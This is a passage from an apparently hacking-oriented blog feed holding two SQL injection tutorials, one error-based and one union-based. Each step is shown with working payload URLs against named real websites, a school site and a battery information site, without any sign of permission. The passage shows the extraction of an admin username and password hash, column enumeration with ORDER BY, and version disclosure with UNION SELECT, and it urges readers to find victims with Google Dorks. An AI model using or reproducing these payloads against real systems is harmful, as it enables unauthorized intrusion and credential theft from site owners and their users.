&lt;p&gt;Here’s what the address is gonna look like:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x697162616c5f697162616c AND table_name=0x73657474696e6773 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Notice the hexed variables and the LIMIT Function.&lt;br&gt;Keep incrementing the LIMIT until you find the valuable columns which in our case is “userName” and “passWord”.&lt;br&gt;Review what we have just done for less confusion.&lt;/p&gt;
&lt;h3 id=&quot;Step5-Getting-the-Data-from-the-Columns-with-the-help-of-Table-name-and-Database-name&quot;&gt;&lt;a href=&quot;#Step5-Getting-the-Data-from-the-Columns-with-the-help-of-Table-name-and-Database-name&quot; class=&quot;headerlink&quot; title=&quot;Step5: Getting the Data from the Columns with the help of Table name and Database name&quot;&gt;&lt;/a&gt;Step5: Getting the Data from the Columns with the help of Table name and Database name&lt;/h3&gt;&lt;p&gt;Alright now that we know what we need to extract, lets get our goods.&lt;br&gt;As far as what we’re injected in the site, this is our information:&lt;br&gt;database name: iqbal_iqbal&lt;br&gt;table name: settings&lt;br&gt;column names: userName, passWord  &lt;/p&gt;
&lt;p&gt;Here’s what the query will look like first (for extracting data):&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;and(select 1 from(select count(*),concat((select (select&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;(SELECT concat(0x7e,0x27,cast(table_name.column_name as char),0x27,0x7e) FROM `database_name`.table_name LIMIT N,1) ) from&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Variables:&lt;br&gt;table_name.column_name: Input the table name and column name you want to extract information from.  &lt;/p&gt;
&lt;p&gt;database_name.table_name: Input the database name and table name you want to extract information from.  &lt;/p&gt;
&lt;p&gt;LIMIT Function: Increment until you find the data you need.  &lt;/p&gt;
&lt;p&gt;So here’s what our address is gonna look like when we extract details from userName.&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.userName as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Output:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;admim&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Query for extracting details from passWord:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.aliqbalschools.org/index.php?mode=getpagecontent&amp;amp;pageID=21 and(select 1 from(select count(*),concat((select (select(SELECT concat(0x7e,0x27,cast(settings.passWord as char),0x27,0x7e) FROM `iqbal_iqbal`.settings LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Output:&lt;br&gt;&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;86f574c1d63d53fa804c13c3213953d9&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Username: admin&lt;br&gt;Password: 86f574c1d63d53fa804c13c3213953d9  &lt;/p&gt;
&lt;h2 id=&quot;Conclusion&quot;&gt;&lt;a href=&quot;#Conclusion&quot; class=&quot;headerlink&quot; title=&quot;Conclusion&quot;&gt;&lt;/a&gt;Conclusion&lt;/h2&gt;&lt;p&gt;Alright I think that’s pretty much what you have to know about Error Based/Double Query SQL injection.&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;/p&gt;
</content>

    <summary type="html">

      &lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;Alright I’ll make this tutorial as short as possib

    </summary>

      <category term="A-SQLi" scheme="http://sec.php101.cn/categories/A-SQLi/"/>


      <category term="MegaSQLi" scheme="http://sec.php101.cn/tags/MegaSQLi/"/>

      <category term="Error Based" scheme="http://sec.php101.cn/tags/Error-Based/"/>

      <category term="Double Query" scheme="http://sec.php101.cn/tags/Double-Query/"/>

  </entry>

  <entry>
    <title>SQLi--PART III:Union Based/Normal SQL Injection</title>
    <link href="http://sec.php101.cn/2014/11/01/SQLi--PART-IIIUnion-BasedNormal-SQL-injection/"/>
    <id>http://sec.php101.cn/2014/11/01/SQLi--PART-IIIUnion-BasedNormal-SQL-injection/</id>
    <published>2014-11-01T02:24:33.000Z</published>
    <updated>2016-10-25T13:48:11.000Z</updated>

    <content type="html">&lt;h2 id=&quot;Preface&quot;&gt;&lt;a href=&quot;#Preface&quot; class=&quot;headerlink&quot; title=&quot;Preface&quot;&gt;&lt;/a&gt;Preface&lt;/h2&gt;&lt;p&gt;The method used to extract information from a database in a website using SQL injection queries on the URL/Address bar is what we’re gonna learn today.  &lt;/p&gt;
&lt;p&gt;Previous tutorial: &lt;a href=&quot;http://sec.php101.cn/2014/10/30/SQLi--PART-IIBypassing-Login-pages-on-websites-using-SQL-injectable-queries/&quot;&gt;Bypassing Login Pages with SQL injection&lt;/a&gt;  &lt;/p&gt;
&lt;p&gt;There are many types of SQL injection when it comes to web hacking.  &lt;/p&gt;
&lt;p&gt;What we learned in the previous tutorial was the only Basics where were used it to bypass Admin/User logins.  &lt;/p&gt;
&lt;p&gt;However, what will you do if can’t bypass it even though it’s vulnerable to SQL injection?  &lt;/p&gt;
&lt;p&gt;Well, the answer is simple. You do the process on your URL/Address bar instead of the text boxes on an admin/user login page.  &lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Common Types of SQL injection are:&lt;/strong&gt;&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;6&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;UNION Based SQL injection&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;String Based SQL injection&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Error Based SQL injection&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Double Query SQL injection&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;Blind SQL injection&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;MsSQL injection&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;What we are going to learn today is what we call &lt;code&gt;UNION Based SQL injection&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;Alright before we start we need to know how a website works while it stores Login information/pages/pictures/etc. in its database.  &lt;/p&gt;
&lt;p&gt;Lets just say that our website will look like this:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.site.com/index.php?id=5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Notice at the end of the URL, “id=5”.&lt;br&gt;This is what the query will look like:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;SELECT * FROM index&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;WHERE id = 5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Alright, now you know a bit of how the website works, let’s get hacking.  &lt;/p&gt;
&lt;h2 id=&quot;Step1-Finding-the-vulnerability-in-a-website&quot;&gt;&lt;a href=&quot;#Step1-Finding-the-vulnerability-in-a-website&quot; class=&quot;headerlink&quot; title=&quot;Step1: Finding the vulnerability in a website&quot;&gt;&lt;/a&gt;Step1: Finding the vulnerability in a website&lt;/h2&gt;&lt;p&gt;It’ll be like a small puzzle you have to solve. See, you can’t just hack a website like &lt;code&gt;http://www.site.com&lt;/code&gt; -.-  &lt;/p&gt;
&lt;p&gt;To hack a website, you need to scan it yourself by clicking links and find out if there’s something like “index.php?id=XXX” where “XXX” is a random integer (number) or string (word).  &lt;/p&gt;
&lt;p&gt;Alright now to find sites vulnerable to SQLi is using Google Dorks.  &lt;/p&gt;
&lt;p&gt;Once you’ve found a site vulnerable to SQLi, it’s time to execute queries.  &lt;/p&gt;
&lt;p&gt;For this tutorial, we’ll be using &lt;code&gt;http://www.leadacidbatteryinfo.org&lt;/code&gt; as an example.  &lt;/p&gt;
&lt;p&gt;Try browsing the website and see if you can find links like &lt;code&gt;index.php?id=xxx&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;It can be anything like &lt;code&gt;details.php?id=xxx&lt;/code&gt; or &lt;code&gt;gallery.php?id=&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Just find an address with a number at the end of the URL.  &lt;/p&gt;
&lt;p&gt;Here’s what I found &lt;code&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=51&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;Now to test for vulnerabilities is by ADDING a quote “ ‘ “ at the end of the url i.e after the integer or string, So it’ll look like this:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=51&amp;apos;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now you’ll notice an error saying:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near &amp;apos;\&amp;apos;&amp;apos; at line 1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;This shows that the website is vulnerable to SQL injection.  &lt;/p&gt;
&lt;p&gt;How is this possible?  &lt;/p&gt;
&lt;p&gt;Look at the query when we added a quote “ ‘ “:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;SELECT * FROM article&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	WHERE id = 5 &amp;apos;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Notice that, their database never stored “id = 5 ‘ “  &lt;/p&gt;
&lt;p&gt;This is why they return an error result.  &lt;/p&gt;
&lt;p&gt;Now that we know the website is vulnerable to SQL injection, let’s advance to the next process.  &lt;/p&gt;
&lt;h2 id=&quot;Step2-Finding-the-number-of-columns-a-website-has&quot;&gt;&lt;a href=&quot;#Step2-Finding-the-number-of-columns-a-website-has&quot; class=&quot;headerlink&quot; title=&quot;Step2: Finding the number of columns a website has&quot;&gt;&lt;/a&gt;Step2: Finding the number of columns a website has&lt;/h2&gt;&lt;p&gt;This is the part where most people had commonly misunderstood.  &lt;/p&gt;
&lt;p&gt;To get to the point, what we’re about to do is find how many columns the website has using &lt;strong&gt;NoError/Error&lt;/strong&gt; statements.  &lt;/p&gt;
&lt;p&gt;Alright lets get started.  &lt;/p&gt;
&lt;p&gt;The query we’ll be using is &lt;code&gt;order by X--&lt;/code&gt; where &lt;strong&gt;X&lt;/strong&gt; is a random integer (number).  &lt;/p&gt;
&lt;p&gt;Start by entering &lt;code&gt;order by 25--&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;Enter it at the end of the URL, so it’ll look like this:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 25--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Error, there are no 25 columns, so it’ll be less than 25.   &lt;/p&gt;
&lt;p&gt;Now lets try &lt;code&gt;order by 20--&lt;/code&gt;:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 20--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Still Error, so there are less than 20 columns.  &lt;/p&gt;
&lt;p&gt;How about we go down a bit to &lt;code&gt;order by 5--&lt;/code&gt;:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 5--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;aha! No errors. So let’s see if there are more than 5 columns.  &lt;/p&gt;
&lt;p&gt;Now lets go up to &lt;code&gt;order by 11--&lt;/code&gt;:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 11--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Hmm, no errors I see. So it’s obvious that there could be more than 11 columns.  &lt;/p&gt;
&lt;p&gt;See if we can increase to &lt;code&gt;order by 12--&lt;/code&gt;:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=51 order by 12--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Error! So this means the last number that returned no error is &lt;strong&gt;11&lt;/strong&gt;.   &lt;/p&gt;
&lt;p&gt;Therefore, the website has &lt;strong&gt;11 columns&lt;/strong&gt;.  &lt;/p&gt;
&lt;h2 id=&quot;Step3-Now-that-we-found-the-number-of-Columns-time-to-Execute-the-UNION-SELECT-statement&quot;&gt;&lt;a href=&quot;#Step3-Now-that-we-found-the-number-of-Columns-time-to-Execute-the-UNION-SELECT-statement&quot; class=&quot;headerlink&quot; title=&quot;Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement&quot;&gt;&lt;/a&gt;Step3: Now that we found the number of Columns, time to Execute the UNION SELECT statement&lt;/h2&gt;&lt;p&gt;First off, we need to know what does &lt;code&gt;UNION SELECT&lt;/code&gt; means.  &lt;/p&gt;
&lt;p&gt;Lets say we have 2 tables, “users” and “admin”.  &lt;/p&gt;
&lt;p&gt;Basically, &lt;code&gt;UNION SELECT&lt;/code&gt; is a statement where all these information will be collected as one.  &lt;/p&gt;
&lt;p&gt;Look at this query:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;SELECT * FROM users&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;UNION SELECT * FROM admin&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;If we perform the UNION SELECT statement, we can get both users and admin information from their database.  &lt;/p&gt;
&lt;p&gt;The point is that, UNION SELECT returns our results with the information we need.  &lt;/p&gt;
&lt;p&gt;If you want to find vulnerable columns, use &lt;code&gt;UNION SELECT&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If you want to find version of database, &lt;code&gt;UNION SELECT&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If you want admin information! use &lt;code&gt;UNION SELECT&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;Alright, now that we know something about the Union function, lets continue.  &lt;/p&gt;
&lt;p&gt;Take our website that has 11 columns and add a “UNION SELECT” statement.  &lt;/p&gt;
&lt;p&gt;Here’s how our query will look like: &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;This is what you would normally do if you use UNION function while SQL injecting a website.  &lt;/p&gt;
&lt;p&gt;Focus on something like this, &lt;code&gt;index.php?id=-X UNION SELECT N--&lt;/code&gt;.  &lt;/p&gt;
&lt;p&gt;Where &lt;code&gt;X&lt;/code&gt; is a random integer/string and &lt;code&gt;N&lt;/code&gt; is the number of columns followed by two hyphens &lt;code&gt;--&lt;/code&gt; and another hyphen &lt;code&gt;-&lt;/code&gt; beside &lt;code&gt;X&lt;/code&gt;.  &lt;/p&gt;
&lt;h2 id=&quot;Step4-Random-numbers-appear-on-screen-the-next-step&quot;&gt;&lt;a href=&quot;#Step4-Random-numbers-appear-on-screen-the-next-step&quot; class=&quot;headerlink&quot; title=&quot;Step4: Random numbers appear on screen, the next step&quot;&gt;&lt;/a&gt;Step4: Random numbers appear on screen, the next step&lt;/h2&gt;&lt;p&gt;Alright I’m pretty sure you’ll find a bunch of numbers showing up on the screen.  &lt;/p&gt;
&lt;p&gt;These are known as &lt;code&gt;vulnerable columns&lt;/code&gt; which states that those vulnerable columns have stored data inside them we need to extract.  &lt;/p&gt;
&lt;p&gt;You need to inject the number at the very top (always at the very top).  &lt;/p&gt;
&lt;p&gt;So, in this case we have number “8”.  &lt;/p&gt;
&lt;p&gt;Now you might be asking, what can I do with a vulnerable column?  &lt;/p&gt;
&lt;p&gt;Well here’s what you can get– &lt;strong&gt;INFORMATION!&lt;/strong&gt;  &lt;/p&gt;
&lt;p&gt;You need a lot of information to study from the website, here are a couple of examples.&lt;/p&gt;
&lt;p&gt;Replace the vulnerable column i.e number 8 with a statement.  &lt;/p&gt;
&lt;p&gt;Statements:&lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;5&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;@@version, version()&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;database(),&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;user(),&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;@@hostname&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;@@datadir&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Their functions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;@@version/version() = find the version of the database&lt;/li&gt;
&lt;li&gt;database() = find the current database&lt;/li&gt;
&lt;li&gt;user() = find the user information&lt;/li&gt;
&lt;li&gt;@@hostname = Current hosting info&lt;/li&gt;
&lt;li&gt;@@datadir = directory of the data of the website&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;To find the version of the database in the website, replace the vulnerable column i.e number 8 with “@@version” or “version().   &lt;/p&gt;
&lt;p&gt;It’ll look like this:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;http://www.leadacidbatteryinfo.org/newsdetail.php?id=-51 UNION SELECT 1,2,3,4,5,6,7,@@version,9,10,11--&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Results:  &lt;/p&gt;
&lt;figure class=&quot;highlight plain&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;gutter&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;5.1.52-log&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;So the database version is 5, which is good because it’ll be easier to SQL inject the website.  &lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Note: Database version less than 5 “&lt;5&quot; 5=&quot;&quot; ==&quot;&quot; you=&quot;&quot; need=&quot;&quot; to=&quot;&quot; guess=&quot;&quot; tables=&quot;&quot; (a=&quot;&quot; bit=&quot;&quot; hard=&quot;&quot; work)=&quot;&quot; database=&quot;&quot; version=&quot;&quot; greater=&quot;&quot; than=&quot;&quot; &quot;=&quot;&quot;&gt;5” = easy to inject with another function i.e group_concat&lt;/5&quot;&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If you ever want to SQLi a website with version &amp;lt;5, then you can guess the tables with the following below:&lt;/p&gt;
